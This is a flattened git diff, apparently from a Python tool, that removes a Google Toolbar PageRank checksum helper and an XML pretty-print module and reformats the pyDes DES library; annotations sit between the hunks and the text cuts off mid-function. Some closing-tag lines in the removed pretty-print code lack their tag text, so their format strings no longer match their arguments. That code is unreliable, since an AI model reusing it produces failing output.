-# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -# THE SOFTWARE. 
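The pagerank helper deleted just below implemented the old Google Toolbar checksum: hash_url() folds the URL into two integer accumulators, check_hash() prepends a '7' plus a check digit, and the result was sent as the 'ch' parameter to toolbarqueries.google.com. A hedged sketch of how the removed functions were driven before this patch (Python 2 era code; the toolbar endpoint is long retired, so the lookup now falls back to 'N/A' or '0'):

# Sketch of how the removed pagerank helpers were invoked (pre-removal, Python 2).
from thirdparty.pagerank.pagerank import get_pagerank, hash_url, check_hash

url = 'http://www.example.com/'
ch = check_hash(hash_url(url))  # checksum string with a leading '7' check prefix
print(ch)
print(get_pagerank(url))        # queries the defunct toolbar endpoint; 'N/A' on failure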
-# - -pass diff --git a/thirdparty/pagerank/pagerank.py b/thirdparty/pagerank/pagerank.py deleted file mode 100644 index 60a654fd1cc..00000000000 --- a/thirdparty/pagerank/pagerank.py +++ /dev/null @@ -1,78 +0,0 @@ -#!/usr/bin/env python -# -# Script for getting Google Page Rank of page -# Google Toolbar 3.0.x/4.0.x Pagerank Checksum Algorithm -# -# original from http://pagerank.gamesaga.net/ -# this version was adapted from http://www.djangosnippets.org/snippets/221/ -# by Corey Goldberg - 2010 -# -# important update (http://www.seroundtable.com/google-pagerank-change-14132.html) -# by Miroslav Stampar - 2012 -# -# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php - -import urllib - -def get_pagerank(url): - _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url)) - try: - f = urllib.urlopen(_) - rank = f.read().strip()[9:] - except Exception: - rank = 'N/A' - else: - rank = '0' if not rank or not rank.isdigit() else rank - return rank - -def int_str(string_, integer, factor): - for i in xrange(len(string_)) : - integer *= factor - integer &= 0xFFFFFFFF - integer += ord(string_[i]) - - return integer - -def hash_url(string_): - c1 = int_str(string_, 0x1505, 0x21) - c2 = int_str(string_, 0, 0x1003F) - - c1 >>= 2 - c1 = ((c1 >> 4) & 0x3FFFFC0) | (c1 & 0x3F) - c1 = ((c1 >> 4) & 0x3FFC00) | (c1 & 0x3FF) - c1 = ((c1 >> 4) & 0x3C000) | (c1 & 0x3FFF) - - t1 = (c1 & 0x3C0) << 4 - t1 |= c1 & 0x3C - t1 = (t1 << 2) | (c2 & 0xF0F) - - t2 = (c1 & 0xFFFFC000) << 4 - t2 |= c1 & 0x3C00 - t2 = (t2 << 0xA) | (c2 & 0xF0F0000) - - return (t1 | t2) - -def check_hash(hash_int): - hash_str = '%u' % (hash_int) - flag = 0 - check_byte = 0 - - i = len(hash_str) - 1 - while i >= 0: - byte = int(hash_str[i]) - if 1 == (flag % 2): - byte *= 2; - byte = byte / 10 + byte % 10 - check_byte += byte - flag += 1 - i -= 1 - - check_byte %= 10 - if 0 != check_byte: - check_byte = 10 - check_byte - if 1 == flag % 2: - if 1 == check_byte % 2: - check_byte += 9 - check_byte >>= 1 - - return '7' + str(check_byte) + hash_str diff --git a/thirdparty/prettyprint/__init__.py b/thirdparty/prettyprint/__init__.py deleted file mode 100644 index 1f9e1434354..00000000000 --- a/thirdparty/prettyprint/__init__.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python - -#Copyright (c) 2010, Chris Hall -#All rights reserved. - -#Redistribution and use in source and binary forms, with or without modification, -#are permitted provided that the following conditions are met: - -#* Redistributions of source code must retain the above copyright notice, -#this list of conditions and the following disclaimer. -#* Redistributions in binary form must reproduce the above copyright notice, -#this list of conditions and the following disclaimer in the documentation -#and/or other materials provided with the distribution. - -#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -#DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR -#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -pass diff --git a/thirdparty/prettyprint/prettyprint.py b/thirdparty/prettyprint/prettyprint.py deleted file mode 100644 index 586d808114a..00000000000 --- a/thirdparty/prettyprint/prettyprint.py +++ /dev/null @@ -1,97 +0,0 @@ -#!/usr/bin/env python - -#Copyright (c) 2010, Chris Hall -#All rights reserved. - -#Redistribution and use in source and binary forms, with or without modification, -#are permitted provided that the following conditions are met: - -#* Redistributions of source code must retain the above copyright notice, -#this list of conditions and the following disclaimer. -#* Redistributions in binary form must reproduce the above copyright notice, -#this list of conditions and the following disclaimer in the documentation -#and/or other materials provided with the distribution. - -#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -#ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -#DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR -#ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -#LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -#ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
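The prettyprint module removed below monkey-patches xml.dom.minidom (writexml/toprettyxml) so that whitespace-only text nodes are collapsed before re-indenting. A rough standard-library-only sketch of the effect its format() helper aims for, without that patch (so the output may keep extra blank lines):

# Plain-minidom approximation of the removed prettyprint.format() helper.
from xml.dom import minidom

raw = "<root><a>1</a><b>2</b></root>"
doc = minidom.parseString(raw)
print(doc.childNodes[0].toprettyxml(indent='    '))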
- -from xml.dom import minidom -from xml.dom import Node - -def format(text): - doc = minidom.parseString(text) - root = doc.childNodes[0] - return root.toprettyxml(indent=' ') - -def formatXML(doc, encoding=None): - root = doc.childNodes[0] - return root.toprettyxml(indent=' ', encoding=encoding) - -def _patch_minidom(): - minidom.Text.writexml = _writexml_text - minidom.Element.writexml = _writexml_element - minidom.Node.toprettyxml = _toprettyxml_node - -def _collapse(node): - for child in node.childNodes: - if child.nodeType == Node.TEXT_NODE and len(child.data.strip()) == 0: - child.data = '' - else: - _collapse(child) - -def _writexml_text(self, writer, indent="", addindent="", newl=""): - minidom._write_data(writer, "%s"%(self.data.strip())) - -def _writexml_element(self, writer, indent="", addindent="", newl=""): - # indent = current indentation - # addindent = indentation to add to higher levels - # newl = newline string - writer.write(indent+"<" + self.tagName) - - attrs = self._get_attributes() - a_names = attrs.keys() - a_names.sort() - - for a_name in a_names: - writer.write(" %s=\"" % a_name) - minidom._write_data(writer, attrs[a_name].value) - writer.write("\"") - if self.childNodes: - if self.childNodes[0].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0: - writer.write(">") - else: - writer.write(">%s"%(newl)) - for node in self.childNodes: - node.writexml(writer,indent+addindent,addindent,newl) - if self.childNodes[-1].nodeType == Node.TEXT_NODE and len(self.childNodes[0].data) > 0: - writer.write("%s" % (self.tagName,newl)) - else: - writer.write("%s%s" % (indent,self.tagName,newl)) - else: - writer.write("/>%s"%(newl)) - -def _toprettyxml_node(self, indent="\t", newl="\n", encoding = None): - _collapse(self) - # indent = the indentation string to prepend, per level - # newl = the newline string to append - writer = minidom._get_StringIO() - if encoding is not None: - import codecs - # Can't use codecs.getwriter to preserve 2.0 compatibility - writer = codecs.lookup(encoding)[3](writer) - if self.nodeType == Node.DOCUMENT_NODE: - # Can pass encoding only to document, to put it into XML header - self.writexml(writer, "", indent, newl, encoding) - else: - self.writexml(writer, "", indent, newl) - return writer.getvalue() - -_patch_minidom() diff --git a/thirdparty/pydes/pyDes.py b/thirdparty/pydes/pyDes.py index 13e55925097..5322bf10cf9 100644 --- a/thirdparty/pydes/pyDes.py +++ b/thirdparty/pydes/pyDes.py @@ -1,10 +1,10 @@ ############################################################################# -# Documentation # +# Documentation # ############################################################################# # Author: Todd Whiteman # Date: 16th March, 2009 -# Verion: 2.0.0 +# Version: 2.0.1 # License: Public Domain - free to do as you wish # Homepage: http://twhiteman.netfirms.com/des.html # @@ -32,15 +32,15 @@ pyDes.triple_des(key, [mode], [IV], [pad], [padmode]) key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes - for Triple DES + for Triple DES mode -> Optional argument for encryption type, can be either - pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining) + pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining) IV -> Optional Initial Value bytes, must be supplied if using CBC mode. - Length must be 8 bytes. + Length must be 8 bytes. pad -> Optional argument, set the pad character (PAD_NORMAL) to use during - all encrypt/decrpt operations done with this instance. 
+ all encrypt/decrpt operations done with this instance. padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5) - to use during all encrypt/decrpt operations done with this instance. + to use during all encrypt/decrpt operations done with this instance. I recommend to use PAD_PKCS5 padding, as then you never need to worry about any padding issues, as the padding can be removed unambiguously upon decrypting @@ -53,12 +53,12 @@ data -> Bytes to be encrypted/decrypted pad -> Optional argument. Only when using padmode of PAD_NORMAL. For - encryption, adds this characters to the end of the data block when - data is not a multiple of 8 bytes. For decryption, will remove the - trailing characters that match this pad character from the last 8 - bytes of the unencrypted data block. + encryption, adds this characters to the end of the data block when + data is not a multiple of 8 bytes. For decryption, will remove the + trailing characters that match this pad character from the last 8 + bytes of the unencrypted data block. padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL - or PAD_PKCS5). Defaults to PAD_NORMAL. + or PAD_PKCS5). Defaults to PAD_NORMAL. Example @@ -90,8 +90,8 @@ _pythonMajorVersion = sys.version_info[0] # Modes of crypting / cyphering -ECB = 0 -CBC = 1 +ECB = 0 +CBC = 1 # Modes of padding PAD_NORMAL = 1 @@ -105,754 +105,748 @@ # The base class shared by des and triple des. class _baseDes(object): - def __init__(self, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): - if IV: - IV = self._guardAgainstUnicode(IV) - if pad: - pad = self._guardAgainstUnicode(pad) - self.block_size = 8 - # Sanity checking of arguments. - if pad and padmode == PAD_PKCS5: - raise ValueError("Cannot use a pad character with PAD_PKCS5") - if IV and len(IV) != self.block_size: - raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") - - # Set the passed in variables - self._mode = mode - self._iv = IV - self._padding = pad - self._padmode = padmode - - def getKey(self): - """getKey() -> bytes""" - return self.__key - - def setKey(self, key): - """Will set the crypting key for this object.""" - key = self._guardAgainstUnicode(key) - self.__key = key - - def getMode(self): - """getMode() -> pyDes.ECB or pyDes.CBC""" - return self._mode - - def setMode(self, mode): - """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" - self._mode = mode - - def getPadding(self): - """getPadding() -> bytes of length 1. Padding character.""" - return self._padding - - def setPadding(self, pad): - """setPadding() -> bytes of length 1. Padding character.""" - if pad is not None: - pad = self._guardAgainstUnicode(pad) - self._padding = pad - - def getPadMode(self): - """getPadMode() -> pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" - return self._padmode - - def setPadMode(self, mode): - """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" - self._padmode = mode - - def getIV(self): - """getIV() -> bytes""" - return self._iv - - def setIV(self, IV): - """Will set the Initial Value, used in conjunction with CBC mode""" - if not IV or len(IV) != self.block_size: - raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") - IV = self._guardAgainstUnicode(IV) - self._iv = IV - - def _padData(self, data, pad, padmode): - # Pad data depending on the mode - if padmode is None: - # Get the default padding mode. 
- padmode = self.getPadMode() - if pad and padmode == PAD_PKCS5: - raise ValueError("Cannot use a pad character with PAD_PKCS5") - - if padmode == PAD_NORMAL: - if len(data) % self.block_size == 0: - # No padding required. - return data - - if not pad: - # Get the default padding. - pad = self.getPadding() - if not pad: - raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=PAD_PKCS5 or set the pad character.") - data += (self.block_size - (len(data) % self.block_size)) * pad - - elif padmode == PAD_PKCS5: - pad_len = 8 - (len(data) % self.block_size) - if _pythonMajorVersion < 3: - data += pad_len * chr(pad_len) - else: - data += bytes([pad_len] * pad_len) - - return data - - def _unpadData(self, data, pad, padmode): - # Unpad data depending on the mode. - if not data: - return data - if pad and padmode == PAD_PKCS5: - raise ValueError("Cannot use a pad character with PAD_PKCS5") - if padmode is None: - # Get the default padding mode. - padmode = self.getPadMode() - - if padmode == PAD_NORMAL: - if not pad: - # Get the default padding. - pad = self.getPadding() - if pad: - data = data[:-self.block_size] + \ - data[-self.block_size:].rstrip(pad) - - elif padmode == PAD_PKCS5: - if _pythonMajorVersion < 3: - pad_len = ord(data[-1]) - else: - pad_len = data[-1] - data = data[:-pad_len] - - return data - - def _guardAgainstUnicode(self, data): - # Only accept byte strings or ascii unicode values, otherwise - # there is no way to correctly decode the data into bytes. - if _pythonMajorVersion < 3: - if isinstance(data, unicode): - data = data.encode('utf8') - else: - if isinstance(data, str): - # Only accept ascii unicode values. - try: - return data.encode('ascii') - except UnicodeEncodeError: - pass - raise ValueError("pyDes can only work with encoded strings, not Unicode.") - return data + def __init__(self, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): + if IV: + IV = self._guardAgainstUnicode(IV) + if pad: + pad = self._guardAgainstUnicode(pad) + self.block_size = 8 + # Sanity checking of arguments. + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + if IV and len(IV) != self.block_size: + raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") + + # Set the passed in variables + self._mode = mode + self._iv = IV + self._padding = pad + self._padmode = padmode + + def getKey(self): + """getKey() -> bytes""" + return self.__key + + def setKey(self, key): + """Will set the crypting key for this object.""" + key = self._guardAgainstUnicode(key) + self.__key = key + + def getMode(self): + """getMode() -> pyDes.ECB or pyDes.CBC""" + return self._mode + + def setMode(self, mode): + """Sets the type of crypting mode, pyDes.ECB or pyDes.CBC""" + self._mode = mode + + def getPadding(self): + """getPadding() -> bytes of length 1. Padding character.""" + return self._padding + + def setPadding(self, pad): + """setPadding() -> bytes of length 1. 
Padding character.""" + if pad is not None: + pad = self._guardAgainstUnicode(pad) + self._padding = pad + + def getPadMode(self): + """getPadMode() -> pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + return self._padmode + + def setPadMode(self, mode): + """Sets the type of padding mode, pyDes.PAD_NORMAL or pyDes.PAD_PKCS5""" + self._padmode = mode + + def getIV(self): + """getIV() -> bytes""" + return self._iv + + def setIV(self, IV): + """Will set the Initial Value, used in conjunction with CBC mode""" + if not IV or len(IV) != self.block_size: + raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") + IV = self._guardAgainstUnicode(IV) + self._iv = IV + + def _padData(self, data, pad, padmode): + # Pad data depending on the mode + if padmode is None: + # Get the default padding mode. + padmode = self.getPadMode() + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + + if padmode == PAD_NORMAL: + if len(data) % self.block_size == 0: + # No padding required. + return data + + if not pad: + # Get the default padding. + pad = self.getPadding() + if not pad: + raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=PAD_PKCS5 or set the pad character.") + data += (self.block_size - (len(data) % self.block_size)) * pad + + elif padmode == PAD_PKCS5: + pad_len = 8 - (len(data) % self.block_size) + if _pythonMajorVersion < 3: + data += pad_len * chr(pad_len) + else: + data += bytes([pad_len] * pad_len) + + return data + + def _unpadData(self, data, pad, padmode): + # Unpad data depending on the mode. + if not data: + return data + if pad and padmode == PAD_PKCS5: + raise ValueError("Cannot use a pad character with PAD_PKCS5") + if padmode is None: + # Get the default padding mode. + padmode = self.getPadMode() + + if padmode == PAD_NORMAL: + if not pad: + # Get the default padding. + pad = self.getPadding() + if pad: + data = data[:-self.block_size] + \ + data[-self.block_size:].rstrip(pad) + + elif padmode == PAD_PKCS5: + if _pythonMajorVersion < 3: + pad_len = ord(data[-1]) + else: + pad_len = data[-1] + data = data[:-pad_len] + + return data + + def _guardAgainstUnicode(self, data): + # Only accept byte strings or ascii unicode values, otherwise + # there is no way to correctly decode the data into bytes. + if _pythonMajorVersion < 3: + if isinstance(data, unicode): + raise ValueError("pyDes can only work with bytes, not Unicode strings.") + else: + if isinstance(data, str): + # Only accept ascii unicode values. + try: + return data.encode('ascii') + except UnicodeEncodeError: + pass + raise ValueError("pyDes can only work with encoded strings, not Unicode.") + return data ############################################################################# -# DES # +# DES # ############################################################################# class des(_baseDes): - """DES encryption/decrytpion class - - Supports ECB (Electronic Code Book) and CBC (Cypher Block Chaining) modes. - - pyDes.des(key,[mode], [IV]) - - key -> Bytes containing the encryption key, must be exactly 8 bytes - mode -> Optional argument for encryption type, can be either pyDes.ECB - (Electronic Code Book), pyDes.CBC (Cypher Block Chaining) - IV -> Optional Initial Value bytes, must be supplied if using CBC mode. - Must be 8 bytes in length. - pad -> Optional argument, set the pad character (PAD_NORMAL) to use - during all encrypt/decrpt operations done with this instance. 
- padmode -> Optional argument, set the padding mode (PAD_NORMAL or - PAD_PKCS5) to use during all encrypt/decrpt operations done - with this instance. - """ - - - # Permutation and translation tables for DES - __pc1 = [56, 48, 40, 32, 24, 16, 8, - 0, 57, 49, 41, 33, 25, 17, - 9, 1, 58, 50, 42, 34, 26, - 18, 10, 2, 59, 51, 43, 35, - 62, 54, 46, 38, 30, 22, 14, - 6, 61, 53, 45, 37, 29, 21, - 13, 5, 60, 52, 44, 36, 28, - 20, 12, 4, 27, 19, 11, 3 - ] - - # number left rotations of pc1 - __left_rotations = [ - 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 - ] - - # permuted choice key (table 2) - __pc2 = [ - 13, 16, 10, 23, 0, 4, - 2, 27, 14, 5, 20, 9, - 22, 18, 11, 3, 25, 7, - 15, 6, 26, 19, 12, 1, - 40, 51, 30, 36, 46, 54, - 29, 39, 50, 44, 32, 47, - 43, 48, 38, 55, 33, 52, - 45, 41, 49, 35, 28, 31 - ] - - # initial permutation IP - __ip = [57, 49, 41, 33, 25, 17, 9, 1, - 59, 51, 43, 35, 27, 19, 11, 3, - 61, 53, 45, 37, 29, 21, 13, 5, - 63, 55, 47, 39, 31, 23, 15, 7, - 56, 48, 40, 32, 24, 16, 8, 0, - 58, 50, 42, 34, 26, 18, 10, 2, - 60, 52, 44, 36, 28, 20, 12, 4, - 62, 54, 46, 38, 30, 22, 14, 6 - ] - - # Expansion table for turning 32 bit blocks into 48 bits - __expansion_table = [ - 31, 0, 1, 2, 3, 4, - 3, 4, 5, 6, 7, 8, - 7, 8, 9, 10, 11, 12, - 11, 12, 13, 14, 15, 16, - 15, 16, 17, 18, 19, 20, - 19, 20, 21, 22, 23, 24, - 23, 24, 25, 26, 27, 28, - 27, 28, 29, 30, 31, 0 - ] - - # The (in)famous S-boxes - __sbox = [ - # S1 - [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, - 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, - 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, - 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], - - # S2 - [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, - 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, - 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, - 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], - - # S3 - [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, - 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, - 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, - 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], - - # S4 - [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, - 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, - 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, - 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], - - # S5 - [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, - 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, - 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, - 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], - - # S6 - [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, - 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, - 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, - 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], - - # S7 - [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, - 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, - 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, - 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], - - # S8 - [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, - 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, - 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, - 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11], - ] - - - # 32-bit permutation function P used on the output of the S-boxes - __p = [ - 15, 6, 19, 20, 28, 11, - 27, 16, 0, 14, 22, 25, - 4, 17, 30, 9, 1, 7, - 23,13, 31, 26, 2, 8, - 18, 12, 29, 5, 21, 10, - 3, 24 - ] - - # final 
permutation IP^-1 - __fp = [ - 39, 7, 47, 15, 55, 23, 63, 31, - 38, 6, 46, 14, 54, 22, 62, 30, - 37, 5, 45, 13, 53, 21, 61, 29, - 36, 4, 44, 12, 52, 20, 60, 28, - 35, 3, 43, 11, 51, 19, 59, 27, - 34, 2, 42, 10, 50, 18, 58, 26, - 33, 1, 41, 9, 49, 17, 57, 25, - 32, 0, 40, 8, 48, 16, 56, 24 - ] - - # Type of crypting being done - ENCRYPT = 0x00 - DECRYPT = 0x01 - - # Initialisation - def __init__(self, key, mode=ECB, IV=None, pad=None, padmode=PAD_NORMAL): - # Sanity checking of arguments. - if len(key) != 8: - raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.") - _baseDes.__init__(self, mode, IV, pad, padmode) - self.key_size = 8 - - self.L = [] - self.R = [] - self.Kn = [ [0] * 48 ] * 16 # 16 48-bit keys (K1 - K16) - self.final = [] - - self.setKey(key) - - def setKey(self, key): - """Will set the crypting key for this object. Must be 8 bytes.""" - _baseDes.setKey(self, key) - self.__create_sub_keys() - - def __String_to_BitList(self, data): - """Turn the string data, into a list of bits (1, 0)'s""" - if _pythonMajorVersion < 3: - # Turn the strings into integers. Python 3 uses a bytes - # class, which already has this behaviour. - data = [ord(c) for c in data] - - result = [False] * len(data) * 8 - pos = 0 - for ch in data: - result[pos + 0] = (ch & (1 << 7) != 0) - result[pos + 1] = (ch & (1 << 6) != 0) - result[pos + 2] = (ch & (1 << 5) != 0) - result[pos + 3] = (ch & (1 << 4) != 0) - result[pos + 4] = (ch & (1 << 3) != 0) - result[pos + 5] = (ch & (1 << 2) != 0) - result[pos + 6] = (ch & (1 << 1) != 0) - result[pos + 7] = (ch & (1 << 0) != 0) - pos += 8 - - return result - - def __BitList_to_String(self, data): - """Turn the list of bits -> data, into a string""" - result = [0] * (len(data) >> 3) - pos = 0 - while pos < len(data): - c = data[pos + 0] << (7 - 0) - c += data[pos + 1] << (7 - 1) - c += data[pos + 2] << (7 - 2) - c += data[pos + 3] << (7 - 3) - c += data[pos + 4] << (7 - 4) - c += data[pos + 5] << (7 - 5) - c += data[pos + 6] << (7 - 6) - c += data[pos + 7] << (7 - 7) - result[pos >> 3] = c - pos += 8 - - if _pythonMajorVersion < 3: - return ''.join([ chr(c) for c in result ]) - else: - return bytes(result) - - def __permutate(self, table, block): - """Permutate this block with the specified table""" - #return map(lambda x: block[x], table) - return list(block[x] for x in table) - - # Transform the secret key, so that it is ready for data processing - # Create the 16 subkeys, K[1] - K[16] - def __create_sub_keys(self): - """Create the 16 subkeys K[1] to K[16] from the given key""" - key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey())) - i = 0 - # Split into Left and Right sections - self.L = key[:28] - self.R = key[28:] - while i < 16: - j = 0 - # Perform circular left shifts - while j < des.__left_rotations[i]: - self.L.append(self.L[0]) - del self.L[0] - - self.R.append(self.R[0]) - del self.R[0] - - j += 1 - - # Create one of the 16 subkeys through pc2 permutation - self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R) - - i += 1 - - # Main part of the encryption algorithm, the number cruncher :) - def __des_crypt(self, block, crypt_type): - """Crypt the block of data through DES bit-manipulation""" - block = self.__permutate(des.__ip, block) - Bn = [0] * 32 - self.L = block[:32] - self.R = block[32:] - - # Encryption starts from Kn[1] through to Kn[16] - if crypt_type == des.ENCRYPT: - iteration = 0 - iteration_adjustment = 1 - # Decryption starts from Kn[16] down to Kn[1] - else: - iteration = 15 - iteration_adjustment 
= -1 - - i = 0 - while i < 16: - # Make a copy of R[i-1], this will later become L[i] - tempR = self.R[:] - - # Permutate R[i - 1] to start creating R[i] - self.R = self.__permutate(des.__expansion_table, self.R) - - # Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here - self.R = map(lambda x, y: x ^ y, self.R, self.Kn[iteration]) - B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]] - # Optimization: Replaced below commented code with above - #j = 0 - #B = [] - #while j < len(self.R): - # self.R[j] = self.R[j] ^ self.Kn[iteration][j] - # j += 1 - # if j % 6 == 0: - # B.append(self.R[j-6:j]) - - # Permutate B[1] to B[8] using the S-Boxes - j = 0 - pos = 0 - while j < 8: - # Work out the offsets - m = (B[j][0] << 1) + B[j][5] - n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4] - - # Find the permutation value - v = des.__sbox[j][(m << 4) + n] - - # Turn value into bits, add it to result: Bn - Bn[pos] = (v & 8) >> 3 - Bn[pos + 1] = (v & 4) >> 2 - Bn[pos + 2] = (v & 2) >> 1 - Bn[pos + 3] = v & 1 - - pos += 4 - j += 1 - - # Permutate the concatination of B[1] to B[8] (Bn) - self.R = self.__permutate(des.__p, Bn) - - # Xor with L[i - 1] - self.R = map(lambda x, y: x ^ y, self.R, self.L) - # Optimization: This now replaces the below commented code - #j = 0 - #while j < len(self.R): - # self.R[j] = self.R[j] ^ self.L[j] - # j += 1 - - # L[i] becomes R[i - 1] - self.L = tempR - - i += 1 - iteration += iteration_adjustment - - # Final permutation of R[16]L[16] - self.final = self.__permutate(des.__fp, self.R + self.L) - return self.final - - - # Data to be encrypted/decrypted - def crypt(self, data, crypt_type): - """Crypt the data in blocks, running it through des_crypt()""" - - # Error check the data - if not data: - return '' - if len(data) % self.block_size != 0: - if crypt_type == des.DECRYPT: # Decryption must work on 8 byte blocks - raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.") - if not self.getPadding(): - raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. 
